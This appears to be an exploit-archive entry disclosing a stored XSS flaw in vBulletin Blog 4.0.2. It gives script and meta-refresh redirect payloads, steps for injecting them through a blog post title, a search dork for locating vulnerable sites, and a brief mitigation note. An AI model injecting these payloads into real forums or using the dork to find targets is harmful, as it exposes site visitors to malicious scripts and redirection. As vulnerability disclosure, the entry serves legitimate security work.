header-logo
Suggest Exploit
vendor:
Vbulletin Blog
by:
FormatXformat
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: Vbulletin Blog
Affected Version From: Vbulletin 4.0.2
Affected Version To: Vbulletin 4.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:vbulletin:vbulletin_blog:4.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Vbulletin Blog 4.0.2 XSS Vulnerability

The script is affected by Permanent XSS vulnerability, so you can put in bad java script code <script>alert('put this script in title')</script> <meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'> 1st register, Go to Blogs page, Create New Post, Inject your java script into Title Box, You must go back to Main page to see this XSS effect.

Mitigation:

Input validation, output encoding, and proper access control should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2


Dork:
Powered by vBulletin™  Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.


The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.



Greets: Neo, Sa3id, All Tkurd.net Members

Navigation

Suggest Exploit

Services By CQR